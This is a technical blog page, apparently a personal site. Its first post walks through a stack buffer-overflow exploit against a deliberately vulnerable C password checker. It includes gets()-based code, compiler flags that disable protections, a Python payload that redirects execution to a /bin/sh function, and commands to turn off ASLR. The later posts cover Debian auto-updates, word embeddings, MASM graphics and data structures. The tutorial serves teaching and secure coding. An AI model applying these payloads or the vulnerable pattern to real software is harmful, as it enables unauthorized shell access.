Cogs and Levers A blog full of technical stuff

Understanding Buffer Overrun Exploits

Introduction

Buffer overrun exploits (also known as buffer overflow attacks) are one of the most well-known and dangerous types of vulnerabilities in software security. These exploits take advantage of how a program manages memory—specifically, by writing more data to a buffer (an allocated block of memory) than it can safely hold. When this happens, the excess data can overwrite adjacent memory locations, potentially altering the program’s control flow or causing it to behave unpredictably.

Attackers can exploit buffer overruns to inject malicious code or manipulate the system to execute arbitrary instructions, often gaining unauthorized access to the target system. Despite being a well-studied vulnerability, buffer overflows remain relevant today, particularly in low-level languages like C and C++, which allow direct memory manipulation.

In this post, we’ll take a closer look at buffer overrun exploits, how they work, and explore some real-world code examples in C that demonstrate this vulnerability. By understanding the mechanics behind buffer overflows, we can also better understand how to mitigate them.

Disclaimer: The code in this article is purely for demonstration purposes. We use some intentionally unsafe techniques to set up an exploitable scenario. DO NOT use this code in production applications, ever.

Password Validator Example

In the following example, the program will ask for input from the user and validate it against a password stored on the server.

void do_super_admin_things() {
  system("/bin/sh");
}

int main(int argc, char *argv[]) {
  if (validate_password()) {
    do_super_admin_things();
  } else {
    printf("ERROR: Bad password\n");
  }

  return 0;
}

do_super_admin_things is our example. It might be an admin shell, or something else. The point is this program is trying to control access to that function by making sure you have the password, first!

The validate_password function is responsible for getting that password in from the outside world. It’s prompts, and then reads from stdin. Note the use of gets().

int validate_password() {
  char password_attempt[64];

  printf("What is the password? ");
  gets(password_attempt);

  return check_password(password_attempt);
}

Warning About gets

The usage of gets() here is highly frowned upon because of how insecure it is. Below are notes from the man page for it:

BUGS Never use gets(). Because it is impossible to tell without knowing the data in advance how many characters gets() will read, and because gets() will continue to store characters past the end of the buffer, it is extremely dangerous to use. It has been used to break computer security. Use fgets() instead.

The Library Functions Manual makes it clear. It’s such a horrible function security-wise that it has been deprecated from the C99 standard as per §7.26.13:

The gets function is obsolescent, and is deprecated.

If there’s one thing to learn from this section, it’s don’t use gets().

To get this code to compile, I had to relax some of the standard rules and mute certain warnings:

gcc vuln1.c -m32 -std=c89 -Wno-deprecated-declarations -fno-stack-protector -g -o vuln1 

Checking the Password

The check_password function reads a file from disk that contains the super-secret password, then compares the attempt to the correct password.

int check_password(char *attempt) {
  char password[256];
  int fd = 0;

  if ((fd = open("./the-password", O_RDONLY)) < 0) {
    perror("open");
    return 0;
  }

  ssize_t read_bytes = read(fd, password, 256);
  
  if (password[read_bytes - 1] == 0xa) {
    password[read_bytes - 1] = 0x0;
  }

  close(fd);

  return strncmp(password, attempt, strlen(password)) == 0;
}

Crashes

Initially, if you provide any normal input, the program behaves as expected:

What is the password? AAAAAAAAAAAA
ERROR: Bad password

But if you push the input a bit further, exceeding the bounds of the password_attempt buffer, you can trigger a crash:

What is the password? AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
[1]    60406 segmentation fault (core dumped)  ./vuln1

The program crashes due to a segmentation fault. Checking dmesg gives us more information:

$ dmesg | tail -n 5
[ 4442.984159] vuln1[60406]: segfault at 41414141 ip 0000000041414141 sp 00000000ff9a5670 error 14 likely on CPU 19 (core 35, socket 0)
[ 4442.984189] Code: Unable to access opcode bytes at 0x41414117.

Notice the 41414141 pattern. This is significant because it shows that the capital A’s from our input (0x41 in hexadecimal) are making their way into the instruction pointer (ip). The input we provided has overflowed into crucial parts of the stack, including the instruction pointer.

You can verify that 0x41 represents ‘A’ by running the following command:

echo -e "\x41\x41\x41\x41"
AAAA

Controlling the Instruction Pointer

This works because the large input string is overflowing the password_attempt buffer. This buffer is a local variable in the validate_password function, and in the stack, local variables are stored just below the return address. When password_attempt overflows, the excess data overwrites the return address on the stack. Once overwritten, we control what address the CPU will jump to after validate_password finishes.

Maybe, we could find the address of the do_super_admin_things function and simply jump directly to it. In order to do this, we need to find the address. Only the name of the function is available to us in the source code, and the address
of the function is determined at compile time; so we need to lean on some other tools in order to gather this intel.

By using objdump we can take a look inside of the compiled executable and get this information.

objdump -d vuln1

This will decompile the vuln1 program and give us the location of each of the functions. We search for the function that we want (do_super_admin_things):

00001316 <do_super_admin_things>:
    1316:       55                      push   %ebp
    1317:       89 e5                   mov    %esp,%ebp
    1319:       53                      push   %ebx

We find that it’s at address 00001316. We need to take note of this value as we’ll need it shortly.

Now we need to find the spot among that big group of A’s that we’re sending into the input, exactly where the right spot is, where we can inject our address onto the stack. We’ve already got some inside knowledge about our buffer. It’s 64 bytes in length.

We really need a magic mark in the input so we can determine where to send our address in. We can do that with some well known payload data. We re-run the program with our 64 A’s but we also add a pattern of characters afterwards:

What is the password? AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBCCCCDDDDEEEEFFFF
[1]    60406 segmentation fault (core dumped)  ./vuln1

This seg faults again, but you can see the BBBBCCCCDDDDEEEEFFFF at the end of the 64 A’s. Looking at the log in dmesg now:

[ 9287.917223] vuln1[62745]: segfault at 45454545 ip 0000000045454545 sp 00000000ffa63b50 error 14 likely on CPU 18 (core 34, socket 0)

The 45454545 tells us which part of the input is being sent in as the return address. \x45 is the E’s

echo -e "\x45\x45\x45\x45"
EEEE

That means that our instruction pointer will start at the E’s.

Prepare the Payload

To make life easier for us, we’ll write a python script that will generate this payload for us. Note that this is using our function address from before.

#!/usr/bin/python
import sys

# fill out the original buffer
payload =  b"A" * 64
# extra pad to skip to where we want our instruction pointer 
payload += b"BBBBCCCCDDDD"
# address of our function "do_super_admin_things"
payload += b"\x16\x13\x00\x00"

sys.stdout.buffer.write(payload)

We can now inject this into the execution of our binary and achieve a shell:

$ (python3 payload.py; cat) | ./vuln1 

ls
input  payload.py  the-password  vuln1	vuln1.c

We use (python3 payload.py; cat) here because of the shell’s handling of file descriptors. Without doing this and simply piping the output, our shell would kill the file descriptors off.

Static vs. Runtime Addresses

When we run our program normally, modern operating systems apply Address Space Layout Randomization (ASLR), which shifts memory locations randomly each time the program starts. ASLR is a security feature that makes it more challenging for exploits to rely on hardcoded memory addresses, because the memory layout changes every time the program is loaded.

For example, if we inspect the runtime address of 1do_super_admin_things` in GDB, we might see something like:

(gdb) info address do_super_admin_things
Symbol "do_super_admin_things" is at 0x56556326 in a file compiled without debugging.

This differs from the objdump address 0x1326, as it’s been shifted by the base address of the executable (e.g., 0x56555000 in this case). This discrepancy is due to ASLR.

Temporarily Disabling ASLR for Demonstration

To ensure the addresses in objdump match those at runtime, we can temporarily disable ASLR. This makes the program load at consistent addresses, which is useful for demonstration and testing purposes.

To disable ASLR on Linux, run:

echo 0 | sudo tee /proc/sys/kernel/randomize_va_space

This command disables ASLR system-wide. Be sure to re-enable ASLR after testing by setting the value back to 2:

echo 2 | sudo tee /proc/sys/kernel/randomize_va_space

Conclusion

In this post, we explored the mechanics of buffer overflow exploits, walked through a real-world example in C, and demonstrated how ASLR impacts the addresses used in an exploit. By leveraging objdump, we could inspect static addresses, but we also noted how runtime address randomization, through ASLR, makes these addresses unpredictable.

Disabling ASLR temporarily allowed us to match objdump addresses to those at runtime, making the exploit demonstration clearer. However, this feature highlights why modern systems adopt ASLR: by shifting memory locations each time a program runs, ASLR makes it significantly more difficult for attackers to execute hardcoded exploits reliably.

Understanding and practicing secure coding, such as avoiding vulnerable functions like gets() and implementing stack protections, is crucial in preventing such exploits. Combined with ASLR and other modern defenses, these practices create a layered approach to security, significantly enhancing the resilience of software.

Buffer overflows remain a classic but essential area of study in software security. By thoroughly understanding their mechanisms and challenges, developers and security researchers can better protect systems from these types of attacks.

Setup Unattended Updates for Debian

Introduction

Keeping your Linux servers up to date with the latest security patches is critical. Fortunately, if you’re running a Debian-based distribution (like Debian or Ubuntu), you can easily automate this process using unattended-upgrades. In this guide, we’ll walk through setting up automatic patching with unattended-upgrades, configuring a schedule for automatic reboots after updates, and setting up msmtp to send email notifications from your local Unix mail account.

Installation

The first step is to install unattended-upgrades, which will automatically install security (and optionally other) updates on your server. Here’s how to do it:

sudo apt-get update
sudo apt-get install unattended-upgrades apt-listchanges

After installation, you’ll want to enable unattended-upgrades:

sudo dpkg-reconfigure --priority=low unattended-upgrades

This will configure your server to automatically install security updates. However, you can customize the configuration to also include regular updates if you prefer.

Configuration

By default, unattended-upgrades runs daily, but you can configure it further by adjusting the automatic reboot settings to ensure that your server reboots after installing updates when necessary.

Automatic Updates

Edit the unattended-upgrades configuration file:

sudo vim /etc/apt/apt.conf.d/50unattended-upgrades

Make sure the file has the following settings to apply both security and regular updates:

Unattended-Upgrade::Allowed-Origins {
    "${distro_id}:${distro_codename}-security";
    "${distro_id}:${distro_codename}-updates";
};

Automatic Reboots

You can also configure the server to automatically reboot after installing updates (useful when kernel updates require a reboot). To do this, add or modify the following lines in the same file:

Unattended-Upgrade::Automatic-Reboot "true";
Unattended-Upgrade::Automatic-Reboot-Time "02:00";

Testing and Dry Runs

To give this a quick test, you can use the following:

# dry run the process
sudo unattended-upgrade --dry-run --verbose

# run the unattended upgrade immediately
sudo unattended-upgrade --verbose

Email Notification

In the same file, you can simply add the email address that you’d like to notify:

Unattended-Upgrade::Mail "your-local-username@localhost";

You may need to configure your Debian machine to be able to send email. For this, we’ll use msmtp, which can relay emails. I use gmail, but you can use any provider.

Configuration

Open up the /etc/msmtprc file. For the password here, I needed to use an “App Password” from Google (specifically).

defaults
tls on
tls_trust_file /etc/ssl/certs/ca-certificates.crt
logfile /var/log/msmtp.log

account gmail
host smtp.gmail.com
port 587
auth on
user your-email@gmail.com
password your-password
from your-email@gmail.com

account default : gmail

Default

You can set msmtp as your default by linking it as sendmail.

sudo ln -sf /usr/bin/msmtp /usr/sbin/sendmail

Testing

Make sure your setup for email is working now by sending yourself a test message:

echo "Test email from msmtp" | msmtp your-local-username@localhost

Conclusion

With unattended-upgrades and msmtp configured, your Debian-based servers will automatically stay up to date with security and software patches, and you’ll receive email notifications whenever updates are applied. Automating patch management is crucial for maintaining the security and stability of your servers, and these simple tools make it easy to manage updates with minimal effort.

Happy patching!

Exploring Advanced Word Embeddings

Introduction

In our previous posts, we explored traditional text representation techniques like One-Hot Encoding, Bag-of-Words, and TF-IDF, and we introduced static word embeddings like Word2Vec and GloVe. While these techniques are powerful, they have limitations, especially when it comes to capturing the context of words.

In this post, we’ll explore more advanced topics that push the boundaries of NLP:

  • Contextual Word Embeddings like ELMo, BERT, and GPT
  • Dimensionality Reduction techniques for visualizing embeddings
  • Applications of Word Embeddings in real-world tasks
  • Training Custom Word Embeddings on your own data

Let’s dive in!

Contextual Word Embeddings

Traditional embeddings like Word2Vec and GloVe generate a single fixed vector for each word. This means the word “bank” will have the same vector whether it refers to a “river bank” or a “financial institution,” which is a major limitation in understanding nuanced meanings in context.

Contextual embeddings, on the other hand, generate different vectors for the same word depending on its context. These models are based on deep learning architectures and have revolutionized NLP by capturing the dynamic nature of language.

ELMo (Embeddings from Language Models)

ELMo was one of the first models to introduce the idea of context-dependent word representations. Instead of a fixed vector, ELMo generates a vector for each word that depends on the entire sentence. It uses bidirectional LSTMs to achieve this, looking both forward and backward in the text to understand the context.

BERT (Bidirectional Encoder Representations from Transformers)

BERT takes contextual embeddings to the next level using the Transformer architecture. Unlike traditional models, which process text in one direction (left-to-right or right-to-left), BERT is bidirectional, meaning it looks at all the words before and after a given word to understand its meaning. BERT also uses pretraining and fine-tuning, making it one of the most versatile models in NLP.

GPT (Generative Pretrained Transformer)

While GPT is similar to BERT in using the Transformer architecture, it is primarily unidirectional and excels at generating text. This model has been the backbone for many state-of-the-art systems in tasks like text generation, summarization, and dialogue systems.

Why Contextual Embeddings Matter

Contextual embeddings are critical in modern NLP applications, such as:

  • Named Entity Recognition (NER): Contextual models help disambiguate words with multiple meanings.
  • Machine Translation: These embeddings capture the nuances of language, making translations more accurate.
  • Question-Answering: Systems like GPT-3 excel in understanding and responding to complex queries by leveraging context.

To experiment with BERT, you can try the transformers library from Hugging Face:

from transformers import BertTokenizer, BertModel

# Load pre-trained model tokenizer
tokenizer = BertTokenizer.from_pretrained('bert-base-uncased')

# Tokenize input text
text = "NLP is amazing!"
encoded_input = tokenizer(text, return_tensors='pt')

# Load pre-trained BERT model
model = BertModel.from_pretrained('bert-base-uncased')

# Get word embeddings from BERT
output = model(**encoded_input)
print(output.last_hidden_state)

The tensor output from this process should look something like this:

tensor([[[ 0.0762,  0.0177,  0.0297,  ..., -0.2109,  0.2140,  0.3130],
         [ 0.1237, -1.0247,  0.6718,  ..., -0.3978,  0.9643,  0.7842],
         [-0.2696, -0.3281,  0.3901,  ..., -0.4611, -0.3425,  0.2534],
         ...,
         [ 0.2051,  0.2455, -0.1299,  ..., -0.3859,  0.1110, -0.4565],
         [-0.0241, -0.7068, -0.4130,  ...,  0.9138,  0.3254, -0.5250],
         [ 0.7112,  0.0574, -0.2164,  ...,  0.2193, -0.7162, -0.1466]]],
    grad_fn=<NativeLayerNormBackward0>)

2. Visualizing Word Embeddings

Word embeddings are usually represented as high-dimensional vectors (e.g., 300 dimensions for Word2Vec). While this is great for models, it’s difficult for humans to interpret these vectors directly. This is where dimensionality reduction techniques like PCA and t-SNE come in handy.

Principal Component Analysis (PCA)

PCA reduces the dimensions of the word vectors while preserving the most important information. It helps us visualize clusters of similar words in a lower-dimensional space (e.g., 2D or 3D).

Following on from the previous example, we’ll use the simple embeddings that we’ve generated in the output variable.

from sklearn.decomposition import PCA
import matplotlib.pyplot as plt

# . . .

embeddings = output.last_hidden_state.detach().numpy()

# Reduce embeddings dimensionality with PCA
# The embeddings are 3D (1, sequence_length, hidden_size), so we flatten the first two dimensions
embeddings_2d = embeddings[0]  # Remove the batch dimension, now (sequence_length, hidden_size)

# Apply PCA
pca = PCA(n_components=2)
reduced_embeddings = pca.fit_transform(embeddings_2d)

# Visualize the first two principal components of each token's embedding
plt.figure(figsize=(8,6))
plt.scatter(reduced_embeddings[:, 0], reduced_embeddings[:, 1])

# Add labels for each token
tokens = tokenizer.convert_ids_to_tokens(encoded_input['input_ids'][0])
for i, token in enumerate(tokens):
plt.annotate(token, (reduced_embeddings[i, 0], reduced_embeddings[i, 1]))

plt.title('PCA of BERT Token Embeddings')
plt.xlabel('Principal Component 1')
plt.ylabel('Principal Component 2')
plt.savefig('bert_token_embeddings_pca.png', format='png')

You should see a plot similar to this:

BERT Token Embeddings PCA

This is a scatter plot where the 768 dimensions of each embedding has been reduced two to 2 principal components using Principal Component Analysis (PCA). This allows us to plot these in two-dimensional space.

Some observations when looking at this chart:

Special Tokens [CLS] and [SEP]

These special tokens are essential in BERT. The [CLS] token is typically used as a summary representation for the entire sentence (especially in classification tasks), and the [SEP] token is used to separate sentences or indicate the end of a sentence.

In the plot, you can see [CLS] and [SEP] are far apart from other tokens, especially [SEP], which has a distinct position in the vector space. This makes sense since their roles are unique compared to actual word tokens like “amazing” or “is.”

Subword Tokens

Notice the token labeled ##p. This represents a subword. BERT uses a WordPiece tokenization algorithm, which breaks rare or complex words into subword units. In this case, “NLP” has been split into nl and ##p because BERT doesn’t have “NLP” as a whole word in its vocabulary. The fact that nl and ##p are close together in the plot indicates that BERT keeps semantically related parts of the same word close in the vector space.

Contextual Similarity

The tokens “amazing” and “is” are relatively close to each other, which reflects that they are part of the same sentence and share a contextual relationship. Interestingly, “amazing” is a bit more isolated, which could be because it’s a more distinctive word with a strong meaning, whereas “is” is a more common auxiliary verb and closer to other less distinctive tokens.

Distribution and Separation

The distance between tokens shows how BERT separates different tokens in the vector space based on their contextual meaning. For example, [SEP] is far from the other tokens because it serves a very different role in the sentence. The overall spread of the tokens suggests that BERT embeddings can clearly distinguish between different word types (subwords, regular words, and special tokens).

t-SNE (t-Distributed Stochastic Neighbor Embedding)

t-SNE is another popular technique for visualizing high-dimensional data. It captures both local and global structures of the embeddings and is often used to visualize word clusters based on their semantic similarity.

I’ve continued on from the code that we’ve been using:

from sklearn.manifold import TSNE
import matplotlib.pyplot as plt

embeddings = output.last_hidden_state.detach().numpy()[0]

# use TSNE here
tsne = TSNE(n_components=2, random_state=42, perplexity=1)
reduced_embeddings = tsne.fit_transform(embeddings)

# Plot the t-SNE reduced embeddings
plt.figure(figsize=(8, 6))
plt.scatter(reduced_embeddings[:, 0], reduced_embeddings[:, 1])

# Add labels for each token
for i, token in enumerate(tokens):
plt.annotate(token, (reduced_embeddings[i, 0], reduced_embeddings[i, 1]))

plt.title('t-SNE of BERT Token Embeddings')
plt.xlabel('Dimension 1')
plt.ylabel('Dimension 2')

# Save the plot to a file
plt.savefig('bert_token_embeddings_tsne.png', format='png')

The output of which looks a little different to PCA:

BERT Token Embeddings tSNE

There is a different distribution of the embeddings in comparison.

Real-World Applications of Word Embeddings

Word embeddings are foundational in numerous NLP applications:

  • Semantic Search: Embeddings allow search engines to find documents based on meaning rather than exact keyword matches.
  • Sentiment Analysis: Embeddings can capture the sentiment of text, enabling models to predict whether a review is positive or negative.
  • Machine Translation: By representing words from different languages in the same space, embeddings improve the accuracy of machine translation systems.
  • Question-Answering Systems: Modern systems like GPT-3 use embeddings to understand and respond to natural language queries.

Example: Semantic Search with Word Embeddings

In a semantic search engine, user queries and documents are both represented as vectors in the same embedding space. By calculating the cosine similarity between these vectors, we can retrieve documents that are semantically related to the query.

import numpy as np
from sklearn.metrics.pairwise import cosine_similarity

# Simulate a query embedding (1D vector of size 768, similar to BERT output)
query_embedding = np.random.rand(1, 768)  # Shape: (1, 768)

# Simulate a set of 5 document embeddings (5 documents, each with a 768-dimensional vector)
document_embeddings = np.random.rand(5, 768)  # Shape: (5, 768)

# Compute cosine similarity between the query and the documents
similarities = cosine_similarity(query_embedding, document_embeddings)  # Shape: (1, 5)

# Rank documents by similarity (higher similarity first)
ranked_indices = similarities.argsort()[0][::-1]  # Sort in descending order
print("Ranked document indices (most similar to least similar):", ranked_indices)

# If you want to print the similarity scores as well
print("Similarity scores:", similarities[0][ranked_indices])

Walking through this code:

query_embedding and document_embeddings

  • We generate random vectors to simulate the embeddings. In a real use case, these would come from an embedding model (e.g., BERT, Word2Vec). The query_embedding represents the vector for the user’s query, and document_embeddings represents vectors for a set of documents.

  • Both query_embedding and document_embeddings must have the same dimensionality (e.g., 768 if you’re using BERT).

Cosine Similarity

  • The cosine_similarity() function computes the cosine similarity between the query_embedding and each document embedding.
  • Cosine similarity measures the cosine of the angle between two vectors, which ranges from -1 (completely dissimilar) to 1 (completely similar). In this case, we’re interested in documents that are most similar to the query (values close to 1).

Ranking the Documents

  • We use argsort() to get the indices of the document embeddings sorted in ascending order of similarity.
  • The [::-1] reverses this order so that the most similar documents appear first.
  • The ranked_indices gives the document indices, ranked from most similar to least similar to the query.

The output of which looks like this:

Ranked document indices (most similar to least similar): [3 4 1 2 0]
Similarity scores: [0.76979867 0.7686247  0.75195574 0.74263041 0.72975817]

Training Your Own Word Embeddings

While pretrained embeddings like Word2Vec and BERT are incredibly powerful, sometimes you need embeddings that are fine-tuned to your specific domain or dataset. You can train your own embeddings using frameworks like Gensim for Word2Vec or PyTorch for more complex models.

The following code shows training Word2Vec with Gensim:

from gensim.models import Word2Vec
import nltk
from nltk.tokenize import word_tokenize

nltk.download('punkt_tab')

# Example sentences
sentences = [
    word_tokenize("I love NLP"),
    word_tokenize("NLP is amazing"),
    word_tokenize("Word embeddings are cool")
]

# Train Word2Vec model
model = Word2Vec(sentences, vector_size=100, window=5, min_count=1, workers=4)
# Get vector for a word
vector = model.wv['NLP']
print(vector)

The output here is a 100-dimensional vector that represents the word NLP.

[-5.3622725e-04  2.3643136e-04  5.1033497e-03  9.0092728e-03
 -9.3029495e-03 -7.1168090e-03  6.4588725e-03  8.9729885e-03
 
  . . . . . .

  . . . . . . 

 3.4736372e-03  2.1777749e-04  9.6188262e-03  5.0606038e-03 
 -8.9173904e-03 -7.0415605e-03  9.0145587e-04  6.3925339e-03]

Fine-Tuning BERT with PyTorch

You can also fine-tune BERT or other transformer models on your own dataset. This is useful when you need embeddings that are tailored to a specific domain, such as medical or legal text.

Conclusion

Word embeddings have come a long way, from static models like Word2Vec and GloVe to dynamic, context-aware models like BERT and GPT. These techniques have revolutionized how we represent and process language in NLP. Alongside dimensionality reduction for visualization, applications such as semantic search, sentiment analysis, and custom embeddings training open up a world of possibilities.

Double Buffering with Windows GDI in MASM

Introduction

In a previous post , I detailed a double-buffering implementation written in C. The idea behind double buffering is to draw graphics off-screen, then quickly swap (or “flip”) this off-screen buffer with the visible screen. This technique reduces flickering and provides smoother rendering. While the C implementation was relatively straightforward using GDI functions, I decided to challenge myself by recreating it in assembly language using MASM32.

There are some slight differences that I’ll go through.

The full code is available as a gist to follow along with.

Macros

First up, this module defines some macros that are just helpful blocks of reusable code.

  • szText defines a string inline
  • m2m performs value assignment from a memory location, to another
  • return is a simple analog for the return keyword in c
  • rgb encodes 8 bit RGB components into the eax register
; Defines strings in an ad-hoc fashion
szText MACRO Name, Text:VARARG
    LOCAL lbl
    jmp lbl
    Name db Text,0
lbl:
ENDM

; Assigns a value from a memory location into another memory location
m2m MACRO M1, M2
    push M2
    pop M1
ENDM

; Syntax sugar for returning from a PROC
return MACRO arg
    mov eax, arg
    ret
ENDM

rgb MACRO r, g, b
    xor eax, eax
    mov ah, b
    mov al, g
    rol eax, 8
    mov al, r
ENDM

Setup

The setup is very much like its C counterpart with a registration of a class first, and then the creation of the window.

szText szClassName, "DoubleBufferClass"

mov wc.cbSize, sizeof WNDCLASSEX
mov wc.style, CS_HREDRAW or CS_VREDRAW or CS_BYTEALIGNWINDOW
mov wc.lpfnWndProc, offset WndProc
mov wc.cbClsExtra, NULL
mov wc.cbWndExtra, NULL
m2m wc.hInstance, hInst
mov wc.hbrBackground, NULL
mov wc.lpszMenuName, NULL
mov wc.lpszClassName, offset szClassName

invoke LoadIcon, NULL, IDI_APPLICATION
mov wc.hIcon, eax

invoke LoadCursor, NULL, IDC_ARROW
mov wc.hCursor, eax

mov wc.hIconSm, 0

invoke RegisterClassEx, ADDR wc

The szClassName gives us a reference to the name of the class to use.

invoke CreateWindowEx, WS_EX_APPWINDOW, ADDR szClassName, ADDR szDisplayName, WS_OVERLAPPEDWINDOW,
                       CW_USEDEFAULT, CW_USEDEFAULT, CW_USEDEFAULT, CW_USEDEFAULT, NULL, NULL, hInst, NULL

Message pump

We continue to render out to the window in a loop:

StillRunning:
    invoke PeekMessage, ADDR msg, NULL, 0, 0, PM_REMOVE

    cmp eax, 0
    je RenderFrame

    invoke DispatchMessage, ADDR msg

RenderFrame:

    invoke DrawRandomShape
    invoke InvalidateRect, hWnd, NULL, 0

    cmp bRunning, 1
    je StillRunning

Using InvalidateRect tells the window that there is an update to draw. This is then propagated through the WM_PAINT message.

Window proc

Each of the window messages is handled in a switch/case like arrangement with a series of cmp and je instructions.

In higher level MASM this can be handled using the .IF syntax.

    cmp uMsg, WM_CREATE
    je CreateMessage

    cmp uMsg, WM_DESTROY
    je DestroyMessage

    cmp uMsg, WM_ERASEBKGND
    je EraseBackgroundMessage

    cmp uMsg, WM_CLOSE
    je CloseMessage

    cmp uMsg, WM_SIZE
    je SizeMessage

    cmp uMsg, WM_PAINT
    je PaintMessage

    jmp DefaultWindowHandler

We use the WM_CREATE, WM_SIZE, and WM_DESTROY messages to control when we create and destroy our back buffer.

CreateMessage:
SizeMessage:
    invoke RecreateBackBuffer, hWin
    jmp DefaultWindowHandler

DestroyMessage:

    invoke DestroyBackBuffer, hWin
    invoke PostQuitMessage, 0

    xor eax, eax
    ret

WM_PAINT only needs to worry about drawing the backbuffer to the window.

PaintMessage:
    invoke FlipBackBuffer, hWin
    mov eax, 1
    ret

Handling the buffer

The routine that handles the back buffer construction is called RecreateBackBuffer. It’s a routine that will clean up before it trys to create the back buffer saving the program from memory leaks:

    invoke DestroyBackBuffer, hWin
    
    invoke GetClientRect, hWin, ADDR clientRect
    invoke GetDC, hWin
    mov winDC, eax

    invoke CreateCompatibleDC, winDC
    mov memDC, eax

    mov eax, clientRect.right
    sub eax, clientRect.left
    mov ebx, clientRect.bottom
    sub ebx, clientRect.top

    invoke CreateCompatibleBitmap, winDC, eax, ebx
    mov memBitmap, eax
    invoke SelectObject, memDC, memBitmap
    mov memOldBitmap, eax
    xor eax, eax

DestroyBackBuffer being the first thing called here; it’s just a basic clean up:

    cmp memDC, NULL
    je MemoryDCDeallocated

    invoke SelectObject, memDC, memOldBitmap
    invoke DeleteObject, memBitmap
    invoke DeleteDC, memDC

    mov memDC, NULL
    mov memOldBitmap, NULL
    mov memBitmap, NULL

MemoryDCDeallocated:

    cmp winDC, NULL
    je WindowDCReleased

    invoke ReleaseDC, hWin, winDC
    mov winDC, NULL

WindowDCReleased:

    xor eax, eax
    ret

Flipping

When we want to draw that back buffer to the window, we just use BitBlt from the GDI:

    LOCAL hDC:HDC
    LOCAL ps:PAINTSTRUCT

    invoke BeginPaint, hWin, ADDR ps
    mov hDC, eax

    mov eax, clientRect.right
    sub eax, clientRect.left
    mov ebx, clientRect.bottom
    sub ebx, clientRect.top

    invoke BitBlt, hDC, 0, 0, eax, ebx, memDC, 0, 0, SRCCOPY
    invoke EndPaint, hWin, ADDR ps

    xor eax, eax
    ret

Conclusion

This is just a different take on the same application written in C. Some of the control structures in assembly language can seem a little hard to follow, but there is something elegant about their simplicity.

Data Structures, Algorithms, and Complexity

Introduction

In this post, we’ll walk through fundamental data structures and sorting algorithms, using Python to demonstrate key concepts and code implementations. We’ll also discuss the algorithmic complexity of various operations like searching, inserting, and deleting, as well as the best, average, and worst-case complexities of popular sorting algorithms.

Algorithmic Complexity

When working with data structures and algorithms, it’s crucial to consider how efficiently they perform under different conditions. This is where algorithmic complexity comes into play. It helps us measure how the time or space an algorithm uses grows as the input size increases.

Time Complexity

Time complexity refers to the amount of time an algorithm takes to complete, usually expressed as a function of the size of the input, \(n\). We typically use Big-O notation to describe the worst-case scenario. The goal is to approximate how the time increases as the input size grows.

Common Time Complexities:

  • \(O(1)\) (Constant Time): The runtime does not depend on the size of the input. For example, accessing an element in an array by index takes the same amount of time regardless of the array’s size.
  • \(O(n)\) (Linear Time): The runtime grows proportionally with the size of the input. For example, searching for an element in an unsorted list takes \(O(n)\) time because, in the worst case, you have to check each element.
  • \(O(n^2)\) (Quadratic Time): The runtime grows quadratically with the input size. Sorting algorithms like Bubble Sort and Selection Sort exhibit \(O(n^2)\) time complexity because they involve nested loops.
  • \(O(\log n)\) (Logarithmic Time): The runtime grows logarithmically as the input size increases, often seen in algorithms that reduce the problem size with each step, like binary search.
  • \(O(n \log n)\): This complexity appears in efficient sorting algorithms like Merge Sort and Quick Sort, combining the linear and logarithmic growth patterns.

Space Complexity

Space complexity refers to the amount of memory an algorithm uses relative to the size of the input. This is also expressed in Big-O notation. For instance, sorting an array in-place (i.e., modifying the input array) requires \(O(1)\) auxiliary space, whereas Merge Sort requires \(O(n)\) additional space to store the temporary arrays created during the merge process.

Why Algorithmic Complexity Matters

Understanding the time and space complexity of algorithms is crucial because it helps you:

  • Predict Performance: You can estimate how an algorithm will perform on large inputs, avoiding slowdowns that may arise with inefficient algorithms.
  • Choose the Right Tool: For example, you might choose a hash table (with \(O(1)\) lookup) over a binary search tree (with \(O(\log n)\) lookup) when you need fast access times.
  • Optimize Code: Knowing the time complexity helps identify bottlenecks and guides you in writing more efficient code.

Data Structures

Lists

Python lists are dynamic arrays that support random access. They are versatile and frequently used due to their built-in functionality.

# Python List Example
my_list = [1, 2, 3, 4]
my_list.append(5)    # O(1) - Insertion at the end
my_list.pop()        # O(1) - Deletion at the end
print(my_list[0])    # O(1) - Access

Complexity

  • Access: \(O(1)\)
  • Search: \(O(n)\)
  • Insertion (at end): \(O(1)\)
  • Deletion (at end): \(O(1)\)

Arrays

Arrays are fixed-size collections that store elements of the same data type. While Python lists are dynamic, we can use the array module to simulate arrays.

import array
my_array = array.array('i', [1, 2, 3])
my_array.append(4)
print(my_array)

Complexity

  • Access: \(O(1)\)
  • Search: \(O(n)\)
  • Insertion/Deletion: \(O(n)\)

Stacks

A Stack is a Last-In-First-Out (LIFO) structure. Python lists can be used to simulate stack operations with append() and pop().

class Stack:
    def __init__(self):
        self.stack = []

    def push(self, value):
        self.stack.append(value)

    def pop(self):
        return self.stack.pop()

my_stack = Stack()
my_stack.push(1)
my_stack.push(2)
print(my_stack.pop())  # O(1)

Complexity

  • Push/Pop: \(O(1)\)
  • Peek: \(O(1)\)
  • Search: \(O(n)\)

Queues

A Queue is a First-In-First-Out (FIFO) structure. Python’s collections.deque is efficient for this purpose.

from collections import deque
queue = deque()
queue.append(1)  # Enqueue
queue.append(2)
print(queue.popleft())  # Dequeue O(1)

Complexity

  • Enqueue/Dequeue: \(O(1)\)
  • Search: \(O(n)\)

Sets

Sets are unordered collections with no duplicates. Python’s set is implemented as a hash table.

my_set = set()
my_set.add(1)  # O(1)
my_set.remove(1)  # O(1)
print(1 in my_set)  # O(1)

Complexity

  • Add: \(O(1)\)
  • Remove: \(O(1)\)
  • Search: \(O(1)\)

Maps (Dictionaries)

Dictionaries store key-value pairs and are implemented as hash tables in Python.

my_dict = {}
my_dict['key'] = 'value'  # O(1)
del my_dict['key']  # O(1)
print('key' in my_dict)  # O(1)

Complexity

  • Insertion/Lookup/Deletion: \(O(1)\)

Trees

Trees are hierarchical data structures that allow efficient searching and sorting. A Binary Search Tree (BST) is one common example.

class Node:
    def __init__(self, key):
        self.left = None
        self.right = None
        self.value = key

    def insert(root, key):
        if root is None:
            return Node(key)
